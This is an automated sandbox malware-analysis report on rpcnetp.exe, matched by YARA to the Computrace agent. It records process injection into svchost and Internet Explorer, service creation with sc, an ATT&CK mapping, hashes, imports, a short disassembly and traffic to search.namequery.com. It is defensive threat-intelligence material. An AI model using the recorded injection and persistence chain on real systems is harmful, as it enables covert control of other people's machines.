Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\rpcnetp.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 620000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: E30000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree, explorer.exe6_2_00A12123
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree, explorer.exe6_2_72B22123
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree, explorer.exe8_2_72B22123
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start EcVoz Jump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: 6_2_00A132DE GetVersion,GetStdHandle,CloseHandle,CloseHandle,SetStdHandle,CreateEventA,CreateThread,WaitForSingleObject,WaitForSingleObject,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,ExitProcess,6_2_00A132DE

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Service Execution3Valid Accounts1Valid Accounts1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Windows Service4Access Token Manipulation1Valid Accounts1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsShared Modules1DLL Side-Loading1Windows Service4Access Token Manipulation1Security Account ManagerSystem Information Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Process Injection421Process Injection421NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptDLL Side-Loading1Obfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 499091 Sample: rpcnetp.exe Startdate: 07/10/2021 Architecture: WINDOWS Score: 72 44 Multi AV Scanner detection for dropped file 2->44 46 Sigma detected: Suspicious Svchost Process 2->46 7 rpcnetp.exe 2 2->7         started        11 cmd.exe 2 2->11         started        13 cmd.exe 2 2->13         started        15 svchost.exe 1 2->15         started        process3 file4 32 C:\Users\user\Desktop\rpcnetp.dll, PE32 7->32 dropped 48 Writes to foreign memory regions 7->48 50 Allocates memory in foreign processes 7->50 52 Creates a thread in another existing process (thread injection) 7->52 17 svchost.exe 14 7->17         started        20 conhost.exe 11->20         started        22 sc.exe 1 11->22         started        24 conhost.exe 13->24         started        26 sc.exe 1 13->26         started        signatures5 process6 signatures7 36 Writes to foreign memory regions 17->36 38 Allocates memory in foreign processes 17->38 40 DLL side loading technique detected 17->40 42 Creates a thread in another existing process (thread injection) 17->42 28 iexplore.exe 12 17->28         started        process8 dnsIp9 34 search.namequery.com 209.53.113.223, 49775, 49776, 49777 ASN852CA Canada 28->34 54 Creates a thread in another existing process (thread injection) 28->54 56 Injects files into Windows application 28->56 signatures10

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand
SourceDetectionScannerLabelLink
rpcnetp.exe3%VirustotalBrowse
rpcnetp.exe5%MetadefenderBrowse
rpcnetp.exe3%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\Desktop\rpcnetp.dll7%VirustotalBrowse
C:\Users\user\Desktop\rpcnetp.dll7%ReversingLabs
SourceDetectionScannerLabelLinkDownload
8.1.iexplore.exe.72b20000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
7.1.svchost.exe.72b20000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
6.1.rpcnetp.exe.a10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
6.1.rpcnetp.exe.72b20000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
SourceDetectionScannerLabelLink
search.namequery.com2%VirustotalBrowse
SourceDetectionScannerLabelLink
http://search.namequery.com/2%VirustotalBrowse
http://search.namequery.com/0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
search.namequery.com
209.53.113.223
truefalseunknown
NameMaliciousAntivirus DetectionReputation
http://search.namequery.com/false
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
209.53.113.223
search.namequery.comCanada
852ASN852CAfalse

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:499091
Start date:07.10.2021
Start time:21:22:39
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 46s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:rpcnetp.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:Run as Windows Service
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal72.evad.winEXE@14/5@1/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 78.6% (good quality ratio 76.8%)
  • Quality average: 88.1%
  • Quality standard deviation: 22.9%
HCA Information:
  • Successful, ratio: 66%
  • Number of executed functions: 28
  • Number of non-executed functions: 51
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
  • Excluded IPs from analysis (whitelisted): 20.82.209.183, 95.100.218.79, 204.79.197.222, 93.184.221.240, 209.197.3.8
  • Excluded domains from analysis (whitelisted): fp.msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu.ec.azureedge.net, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, arc.msn.com, wu.azureedge.net, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, a-0019.standard.a-msedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, 1.perf.msedge.net
  • Not all processes where analyzed, report is missing behavior information
TimeTypeDescription
21:23:39API Interceptor1096x Sleep call for process: rpcnetp.exe modified
MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
209.53.113.223NTAgent.exeGet hashmaliciousBrowse
  • search.namequery.com/
rpcnet.exeGet hashmaliciousBrowse
  • search.dnssearch.org/
rpcnetp.exeGet hashmaliciousBrowse
  • search.namequery.com/
MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
search.namequery.comNTAgent.exeGet hashmaliciousBrowse
  • 209.53.113.223
rpcnet.exeGet hashmaliciousBrowse
  • 209.53.113.223
rpcnetp.exeGet hashmaliciousBrowse
  • 209.53.113.223
MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
ASN852CAe7HWBo7yQMGet hashmaliciousBrowse
  • 75.152.119.182
GaSBpMyVubGet hashmaliciousBrowse
  • 162.157.2.46
ntpclientGet hashmaliciousBrowse
  • 204.191.51.200
arm7-20211004-1530Get hashmaliciousBrowse
  • 209.89.133.142
Zot0D0dD8JGet hashmaliciousBrowse
  • 173.183.134.242
lessie.armGet hashmaliciousBrowse
  • 207.229.7.32
sora.armGet hashmaliciousBrowse
  • 161.188.162.163
NazNIp21XuGet hashmaliciousBrowse
  • 205.206.179.186
LRLZJUXBPkGet hashmaliciousBrowse
  • 75.153.94.132
P2gQCIjHzqGet hashmaliciousBrowse
  • 23.16.230.107
sora.armGet hashmaliciousBrowse
  • 75.159.255.198
XO2PcLc9yOGet hashmaliciousBrowse
  • 205.206.220.151
whoareyou.arm7Get hashmaliciousBrowse
  • 162.157.2.71
GbjE8AwfrzGet hashmaliciousBrowse
  • 75.155.101.227
xd.armGet hashmaliciousBrowse
  • 154.5.124.11
soramrk.x86Get hashmaliciousBrowse
  • 142.179.228.81
xd.armGet hashmaliciousBrowse
  • 99.199.0.194
U1gjyXpR35Get hashmaliciousBrowse
  • 23.16.38.70
E2ecGhjXtGGet hashmaliciousBrowse
  • 108.172.196.183
ShxmSBgPmyGet hashmaliciousBrowse
  • 154.5.100.23
No context
No context
C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\1942f959aae25ff5e177f0a0e912022f_d06ed635-68f6-4e9a-955c-4899f5f57b9a
Process:C:\Windows\SysWOW64\svchost.exe
File Type:data
Category:dropped
Size (bytes):57
Entropy (8bit):2.062967662624547
Encrypted:false
SSDEEP:3:/lEltfgnwT:yvT
MD5:B5D2B9D74D52DAC47A3F3CB1D065305F
SHA1:41A4742BC23F3A6FF61C60884604DA6448FFF274
SHA-256:6359A4FCB0DABE70B88913A6A03CC21385459B8A924A6B3688A2E185C54DAAFA
SHA-512:01EA77C5972D33494C10D6ADB47CB3F30EAC1AA4B93D6BAAFB75299AA99FED818A6275801BAAE92C18AC5D3C64443BB631A63C2B39B1B88BCD774218BB2B990F
Malicious:false
Preview: ........................................computer$.
C:\Users\user\Desktop\rpcnetp.dll
Process:C:\Users\user\Desktop\rpcnetp.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):22934
Entropy (8bit):6.250397881773485
Encrypted:false
SSDEEP:384:yaU8dza3ee7IuRMksm9XiL1TN5Aim2DYedCH7iAYxh+aVBKIwvP4o94Iwd:Ddzxe79/9XiL1JPR0edSOAqzBRwX4oK3
MD5:D98DCCF777889A0A9BEEEE2923F511A9
SHA1:0917C66788073AFC994841943D6D1446EFB429C3
SHA-256:E57C660DB9EA653404A0664F0089B92B3D4B954C970EC6AD1DAD999AC50B5CDF
SHA-512:D048E1787DE4C26D143FD3363F28260040D25901D6305BE81106D3B58DBCFEB747EC4F16D8666787F14609090F7B7A80CE5244F767E6B397670262D76E6FC393
Malicious:true
Yara Hits:
  • Rule: PUP_ComputraceAgent, Description: Absolute Computrace Agent Executable, Source: C:\Users\user\Desktop\rpcnetp.dll, Author: ASERT - Arbor Networks (slightly modified by Florian Roth)
Antivirus:
  • Antivirus: Virustotal, Detection: 7%, Browse
  • Antivirus: ReversingLabs, Detection: 7%
Preview: MZ.............j........@...................................H....j......PE..L....U.U.................L..........u6.......`....@.......................................@..........................[..F...<T..x.......................................................................................L............................text....K.......L.................. ..`.data........`.......P..............@....cdata..<....p.......R..............@....reloc...............V..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\Desktop\rpcnetp.dll:Zone.Identifier
Process:C:\Users\user\Desktop\rpcnetp.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:false
Preview: [ZoneTransfer]....ZoneId=0
C:\servicereg.log
Process:C:\Windows\SysWOW64\sc.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):28
Entropy (8bit):3.678439190827718
Encrypted:false
SSDEEP:3:4A4AnXjzSv:4HAnXjg
MD5:A8F4D690C5BDE96AD275C7D4ABE0E3D3
SHA1:7C62C96EFD2CA4F3C3EBF0B24C9B5B4C04A4570A
SHA-256:596CCC911C1772735AAC6A6B756A76D3D55BCECD006B980CF147090B2243FA7B
SHA-512:A875EBE3C5CDF222FF9D08576F4D996AF827A1C86B3E758CE23F6B33530D512A82CE8E39E519837512080C6212A0A19B3385809BE5F5001C4E488DD79550B852
Malicious:false
Preview: [SC] CreateService SUCCESS..
C:\servicestart.log
Process:C:\Windows\SysWOW64\sc.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):421
Entropy (8bit):3.505853435114574
Encrypted:false
SSDEEP:6:lg3D/8Fkov+gVKBRjGxVVLvH2s/u8qLLFmLaZnsHgm66//V+NmASCefq:lgAzv+gV0qVbH2suZLQqOVKmAJcq
MD5:6A48546AF33EB7FDD7E14585D144690C
SHA1:8CA1A55CE066780DB47108C241FBF0ECFFEDED90
SHA-256:298B76A794423060FE25C90832043183E8FE0B31C880626ADDE20F6417289DAE
SHA-512:B2DC8E096EA62C51EB821F5A87EC9EE86BCAE964BE55D571D32A4BEBD52E51A60BC0AAC51877D1069228B1029A64B6C15A3A2C8EB16A52336201B59431398AAC
Malicious:false
Preview: ..SERVICE_NAME: EcVoz .. TYPE : 10 WIN32_OWN_PROCESS .. STATE : 2 START_PENDING .. (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN).. WIN32_EXIT_CODE : 0 (0x0).. SERVICE_EXIT_CODE : 0 (0x0).. CHECKPOINT : 0x0.. WAIT_HINT : 0x7d0.. PID : 7072.. FLAGS : ..

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.250156336870832
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.94%
  • Clipper DOS Executable (2020/12) 0.02%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
File name:rpcnetp.exe
File size:22932
MD5:57bd3200910a8d2c85b1927b27123a6b
SHA1:bd08ae784aa0ed5428347c861ebeb71554af217f
SHA256:f5157e5b8afe1f79f29c947449477d13ede3d7341699256e62966474a7ee1eb5
SHA512:855095db2b996150afc6f5025270fc4f9f5b178bb3969f00e313c867570eca08f58ca5caef1c3950d83ea513434d4efdba24371a6da864665fcfb9288e8dae73
SSDEEP:384:yaU8dza3ee7IuRMksm9XiL1TN5Aim2DYedCH7iAYxh+aVBKIwvP4o94IwS:Ddzxe79/9XiL1JPR0edSOAqzBRwX4oKw
File Content Preview:MZ.............j........@...................................H....j......PE..L....U.U.................L..........u6.......`....@.......................................@..........................[..F...<T..x..................................................

File Icon

Icon Hash:00828e8e8686b000

General

Entrypoint:0x403675
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x55115511 [Tue Mar 24 12:14:09 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:badaaa8b908ad021835c0e473265ef44
Instruction
push ebp
mov ebp, esp
push esi
mov esi, 004060C4h
xor eax, eax
cmp dword ptr [esi], eax
jne 00007F20ECC0138Fh
push eax
call dword ptr [004010C8h]
mov ecx, dword ptr [ebp+08h]
jecxz 00007F20ECC01392h
cmp eax, ecx
je 00007F20ECC0138Eh
mov dword ptr [esi], ecx
push eax
push dword ptr [00401348h]
push ecx
call dword ptr [004010A0h]
cmp eax, 00402658h
pop eax
jne 00007F20ECC01376h
call 00007F20ECC019D0h
mov eax, 00000001h
mov dword ptr [0040608Ch], eax
pop esi
leave
retn 000Ch
mov dword ptr [esi], eax
pop esi
leave
jmp 00007F20ECC00F7Ah
push ebx
push esi
push edi
mov ebx, edx
xor edi, edi
mov esi, edi
mov al, byte ptr [esi+ebx]
inc edi
add al, al
mov byte ptr [esi+ecx], al
cmp edi, dword ptr [esp+10h]
jnl 00007F20ECC0136Fh
mov dl, byte ptr [edi+ecx]
shr dl, 00000007h
or dl, al
mov byte ptr [esi+ecx], dl
jmp 00007F20ECC01344h
pop edi
pop esi
pop ebx
retn 0004h
push ebp
mov ebp, esp
sub esp, 00000184h
push ebx
push esi
mov esi, dword ptr [ebp+18h]
push edi
push esi
push 00000000h
lea eax, dword ptr [ebp-00000184h]
push eax
call 00007F20ECC02980h
mov edi, dword ptr [ebp+10h]
mov edx, esi
mov ecx, edi
mov byte ptr [ebp-00000184h], 00000001h
call 00007F20ECC01616h
mov ebx, eax
jmp 00007F20ECC0139Bh
push dword ptr [ebp+14h]
lea edx, dword ptr [ebp-00000184h]
push eax
mov ecx, edx
dec ebx
call 00007F20ECC01263h
mov eax, ebx
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x5b900x46.text
IMAGE_DIRECTORY_ENTRY_IMPORT0x543c0x78.text
IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x394.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x10000x14c.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x4bd60x4c00False0.651624177632data6.54556135074IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data0x60000x1b80x200False0.11328125data0.461954390647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.cdata0x70000x23c0x400False0.16796875data1.37476659487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc0x80000x3940x394False0.909388646288data6.52173896111IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLLImport
ADVAPI32.dllRegisterServiceCtrlHandlerA, RegCloseKey, RegOpenKeyA, CreateProcessAsUserA, StartServiceCtrlDispatcherA, RegQueryValueExA, SetServiceStatus, RegDeleteValueA, RegEnumValueA, DuplicateTokenEx, OpenProcessToken, SetTokenInformation
KERNEL32.dllCloseHandle, CreateProcessA, SetStdHandle, LocalAlloc, DeleteCriticalSection, GetStdHandle, LeaveCriticalSection, RtlUnwind, GetSystemDirectoryA, CreateThread, ResumeThread, VirtualAllocEx, OpenProcess, LocalFree, WriteProcessMemory, CreateRemoteThread, ReadProcessMemory, InitializeCriticalSection, GetVersion, CopyFileA, TerminateThread, lstrlenA, GetBinaryTypeA, GetCurrentThreadId, VirtualFreeEx, ExitProcess, LoadLibraryA, GetProcAddress, WaitForMultipleObjects, WaitForSingleObject, GetExitCodeThread, lstrcatA, GetCurrentProcessId, FreeLibrary, ExitThread, RaiseException, lstrcpyA, GetModuleHandleA, SetEvent, CreateEventA, Sleep, lstrcmpiA, ResetEvent, CreateFileA, TerminateProcess, WriteFile, SetFilePointer, GetModuleFileNameA, SetThreadPriority, EnterCriticalSection
USER32.dllCreateWindowExA, SetTimer, GetMessageA, TranslateMessage, RegisterClassA, KillTimer, DispatchMessageA, PostMessageA, PostThreadMessageA, PeekMessageA, PostQuitMessage, wsprintfA, DefWindowProcA
USERENV.dllCreateEnvironmentBlock
WSOCK32.dllinet_addr, ioctlsocket
NameOrdinalAddress
rpcnetp10x402658

Network Behavior

Download Network PCAP: filteredfull

Network Port Distribution

  • Total Packets: 123
  • 80 (HTTP)
  • 53 (DNS)
TimestampSource PortDest PortSource IPDest IP
Oct 7, 2021 21:23:45.489679098 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:23:45.489749908 CEST4977680192.168.2.4209.53.113.223
Oct 7, 2021 21:23:45.654690981 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:23:45.654717922 CEST8049776209.53.113.223192.168.2.4
Oct 7, 2021 21:23:46.163032055 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:23:46.163655996 CEST4977680192.168.2.4209.53.113.223
Oct 7, 2021 21:23:48.163186073 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:23:48.163634062 CEST4977680192.168.2.4209.53.113.223
Oct 7, 2021 21:23:48.327733040 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:23:48.327856064 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:23:48.328999996 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:23:48.494014978 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:23:48.602479935 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:23:48.602603912 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:23:52.325102091 CEST4977780192.168.2.4209.53.113.223
Oct 7, 2021 21:23:52.334279060 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:23:52.494050026 CEST8049777209.53.113.223192.168.2.4
Oct 7, 2021 21:23:52.494151115 CEST4977780192.168.2.4209.53.113.223
Oct 7, 2021 21:23:52.501471996 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:23:52.501490116 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:23:52.501550913 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:23:55.245099068 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:23:55.409693003 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:23:55.410012007 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:23:55.410186052 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:23:58.793450117 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:23:58.957880020 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:23:58.961870909 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:23:58.962007046 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:01.556579113 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:01.721520901 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:01.721555948 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:01.723252058 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:02.661020041 CEST8049777209.53.113.223192.168.2.4
Oct 7, 2021 21:24:04.566550970 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:04.732942104 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:04.736144066 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:04.736267090 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:07.688574076 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:07.853148937 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:07.853244066 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:07.853488922 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:10.701740026 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:10.868128061 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:10.868566036 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:10.868704081 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:14.042638063 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:14.208025932 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:14.208306074 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:14.211158037 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:18.016602039 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:18.181540012 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:18.181561947 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:18.181735992 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:21.763349056 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:21.927870989 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:21.928241968 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:21.928397894 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:25.734289885 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:25.899812937 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:25.899960041 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:25.900111914 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:29.996057034 CEST4977580192.168.2.4209.53.113.223
Oct 7, 2021 21:24:30.161999941 CEST8049775209.53.113.223192.168.2.4
Oct 7, 2021 21:24:30.162039042 CEST8049775209.53.113.223192.168.2.4
